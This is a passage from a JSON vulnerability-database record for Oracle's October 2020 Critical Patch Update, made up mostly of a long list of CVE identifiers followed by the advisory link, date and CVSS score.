"CVE-2016-0701", "CVE-2016-1000031", "CVE-2016-1000338", "CVE-2016-1000339", "CVE-2016-1000340", "CVE-2016-1000341", "CVE-2016-1000342", "CVE-2016-1000343", "CVE-2016-1000344", "CVE-2016-1000345", "CVE-2016-1000346", "CVE-2016-1000352", "CVE-2016-10244", "CVE-2016-10328", "CVE-2016-2167", "CVE-2016-2168", "CVE-2016-2183", "CVE-2016-2510", "CVE-2016-3189", "CVE-2016-4800", "CVE-2016-5000", "CVE-2016-5300", "CVE-2016-5725", "CVE-2016-6153", "CVE-2016-6306", "CVE-2016-8610", "CVE-2016-8734", "CVE-2017-10989", "CVE-2017-12626", "CVE-2017-13098", "CVE-2017-13685", "CVE-2017-13745", "CVE-2017-14232", "CVE-2017-15095", "CVE-2017-15286", "CVE-2017-17485", "CVE-2017-3164", "CVE-2017-5644", "CVE-2017-5645", "CVE-2017-5662", "CVE-2017-7525", "CVE-2017-7656", "CVE-2017-7657", "CVE-2017-7658", "CVE-2017-7857", "CVE-2017-7858", "CVE-2017-7864", "CVE-2017-8105", "CVE-2017-8287", "CVE-2017-9096", "CVE-2017-9735", "CVE-2017-9800", "CVE-2018-1000180", "CVE-2018-1000613", "CVE-2018-1000873", "CVE-2018-11054", "CVE-2018-11055", "CVE-2018-11056", "CVE-2018-11057", "CVE-2018-11058", "CVE-2018-11307", "CVE-2018-12022", "CVE-2018-12023", "CVE-2018-12536", "CVE-2018-12538", "CVE-2018-12545", "CVE-2018-14718", "CVE-2018-15769", "CVE-2018-17196", "CVE-2018-18873", "CVE-2018-19139", "CVE-2018-19539", "CVE-2018-19540", "CVE-2018-19541", "CVE-2018-19542", "CVE-2018-19543", "CVE-2018-20346", "CVE-2018-20505", "CVE-2018-20506", "CVE-2018-20570", "CVE-2018-20584", "CVE-2018-20622", "CVE-2018-20843", "CVE-2018-2765", "CVE-2018-3693", "CVE-2018-5382", "CVE-2018-5968", "CVE-2018-6942", "CVE-2018-7489", "CVE-2018-8013", "CVE-2018-8088", "CVE-2018-8740", "CVE-2018-9055", "CVE-2018-9154", "CVE-2018-9252", "CVE-2019-0192", "CVE-2019-0201", "CVE-2019-10072", "CVE-2019-10097", "CVE-2019-1010239", "CVE-2019-10173", "CVE-2019-10241", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-10744", "CVE-2019-11048", "CVE-2019-11358", "CVE-2019-11477", "CVE-2019-11478", "CVE-2019-11479", "CVE-2019-11834", 
"CVE-2019-11835", "CVE-2019-11922", "CVE-2019-12086", "CVE-2019-12260", "CVE-2019-12261", "CVE-2019-12384", "CVE-2019-12402", "CVE-2019-12415", "CVE-2019-12419", "CVE-2019-12423", "CVE-2019-12814", "CVE-2019-12900", "CVE-2019-13990", "CVE-2019-14379", "CVE-2019-14540", "CVE-2019-14893", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1552", "CVE-2019-1563", "CVE-2019-15903", "CVE-2019-16168", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17091", "CVE-2019-17267", "CVE-2019-17359", "CVE-2019-17495", "CVE-2019-17531", "CVE-2019-17543", "CVE-2019-17558", "CVE-2019-17569", "CVE-2019-17632", "CVE-2019-17638", "CVE-2019-18348", "CVE-2019-20330", "CVE-2019-2897", "CVE-2019-2904", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-5018", "CVE-2019-5427", "CVE-2019-5435", "CVE-2019-5436", "CVE-2019-5443", "CVE-2019-5481", "CVE-2019-5482", "CVE-2019-8457", "CVE-2019-9511", "CVE-2019-9513", "CVE-2019-9936", "CVE-2019-9937", "CVE-2020-10108", "CVE-2020-10543", "CVE-2020-10650", "CVE-2020-10672", "CVE-2020-10673", "CVE-2020-10683", "CVE-2020-10722", "CVE-2020-10723", "CVE-2020-10724", "CVE-2020-10878", "CVE-2020-10968", "CVE-2020-10969", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11080", "CVE-2020-11111", "CVE-2020-11112", "CVE-2020-11113", "CVE-2020-11619", "CVE-2020-11620", "CVE-2020-11655", "CVE-2020-11656", "CVE-2020-11971", "CVE-2020-11972", "CVE-2020-11973", "CVE-2020-11984", "CVE-2020-11993", "CVE-2020-11996", "CVE-2020-12243", "CVE-2020-12723", "CVE-2020-13630", "CVE-2020-13631", "CVE-2020-13632", "CVE-2020-13920", "CVE-2020-13934", "CVE-2020-13935", "CVE-2020-14060", "CVE-2020-14061", "CVE-2020-14062", "CVE-2020-14195", "CVE-2020-14672", "CVE-2020-14731", "CVE-2020-14732", "CVE-2020-14734", "CVE-2020-14735", "CVE-2020-14736", "CVE-2020-14740", "CVE-2020-14741", "CVE-2020-14742", "CVE-2020-14743", "CVE-2020-14744", "CVE-2020-14745", "CVE-2020-14746", "CVE-2020-14752", "CVE-2020-14753", "CVE-2020-14754", "CVE-2020-14757", "CVE-2020-14758", 
"CVE-2020-14759", "CVE-2020-14760", "CVE-2020-14761", "CVE-2020-14762", "CVE-2020-14763", "CVE-2020-14764", "CVE-2020-14765", "CVE-2020-14766", "CVE-2020-14767", "CVE-2020-14768", "CVE-2020-14769", "CVE-2020-14770", "CVE-2020-14771", "CVE-2020-14772", "CVE-2020-14773", "CVE-2020-14774", "CVE-2020-14775", "CVE-2020-14776", "CVE-2020-14777", "CVE-2020-14778", "CVE-2020-14779", "CVE-2020-14780", "CVE-2020-14781", "CVE-2020-14782", "CVE-2020-14783", "CVE-2020-14784", "CVE-2020-14785", "CVE-2020-14786", "CVE-2020-14787", "CVE-2020-14788", "CVE-2020-14789", "CVE-2020-14790", "CVE-2020-14791", "CVE-2020-14792", "CVE-2020-14793", "CVE-2020-14794", "CVE-2020-14795", "CVE-2020-14796", "CVE-2020-14797", "CVE-2020-14798", "CVE-2020-14799", "CVE-2020-14800", "CVE-2020-14801", "CVE-2020-14802", "CVE-2020-14803", "CVE-2020-14804", "CVE-2020-14805", "CVE-2020-14806", "CVE-2020-14807", "CVE-2020-14808", "CVE-2020-14809", "CVE-2020-14810", "CVE-2020-14811", "CVE-2020-14812", "CVE-2020-14813", "CVE-2020-14814", "CVE-2020-14815", "CVE-2020-14816", "CVE-2020-14817", "CVE-2020-14818", "CVE-2020-14819", "CVE-2020-14820", "CVE-2020-14821", "CVE-2020-14822", "CVE-2020-14823", "CVE-2020-14824", "CVE-2020-14825", "CVE-2020-14826", "CVE-2020-14827", "CVE-2020-14828", "CVE-2020-14829", "CVE-2020-14830", "CVE-2020-14831", "CVE-2020-14832", "CVE-2020-14833", "CVE-2020-14834", "CVE-2020-14835", "CVE-2020-14836", "CVE-2020-14837", "CVE-2020-14838", "CVE-2020-14839", "CVE-2020-14840", "CVE-2020-14841", "CVE-2020-14842", "CVE-2020-14843", "CVE-2020-14844", "CVE-2020-14845", "CVE-2020-14846", "CVE-2020-14847", "CVE-2020-14848", "CVE-2020-14849", "CVE-2020-14850", "CVE-2020-14851", "CVE-2020-14852", "CVE-2020-14853", "CVE-2020-14854", "CVE-2020-14855", "CVE-2020-14856", "CVE-2020-14857", "CVE-2020-14858", "CVE-2020-14859", "CVE-2020-14860", "CVE-2020-14861", "CVE-2020-14862", "CVE-2020-14863", "CVE-2020-14864", "CVE-2020-14865", "CVE-2020-14866", "CVE-2020-14867", "CVE-2020-14868", "CVE-2020-14869", 
"CVE-2020-14870", "CVE-2020-14871", "CVE-2020-14872", "CVE-2020-14873", "CVE-2020-14875", "CVE-2020-14876", "CVE-2020-14877", "CVE-2020-14878", "CVE-2020-14879", "CVE-2020-14880", "CVE-2020-14881", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-14884", "CVE-2020-14885", "CVE-2020-14886", "CVE-2020-14887", "CVE-2020-14888", "CVE-2020-14889", "CVE-2020-14890", "CVE-2020-14891", "CVE-2020-14892", "CVE-2020-14893", "CVE-2020-14894", "CVE-2020-14895", "CVE-2020-14896", "CVE-2020-14897", "CVE-2020-14898", "CVE-2020-14899", "CVE-2020-14900", "CVE-2020-14901", "CVE-2020-15358", "CVE-2020-15389", "CVE-2020-1730", "CVE-2020-1935", "CVE-2020-1938", "CVE-2020-1941", "CVE-2020-1945", "CVE-2020-1950", "CVE-2020-1951", "CVE-2020-1953", "CVE-2020-1954", "CVE-2020-1967", "CVE-2020-2555", "CVE-2020-3235", "CVE-2020-3909", "CVE-2020-4051", "CVE-2020-5397", "CVE-2020-5398", "CVE-2020-5407", "CVE-2020-5408", "CVE-2020-7067", "CVE-2020-8172", "CVE-2020-8174", "CVE-2020-8840", "CVE-2020-9281", "CVE-2020-9327", "CVE-2020-9409", "CVE-2020-9410", "CVE-2020-9484", "CVE-2020-9488", "CVE-2020-9489", "CVE-2020-9490", "CVE-2020-9546", "CVE-2020-9547", "CVE-2020-9548"], "modified": "2020-12-08T00:00:00", "id": "ORACLE:CPUOCT2020", "href": "https://www.oracle.com/security-alerts/cpuoct2020.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}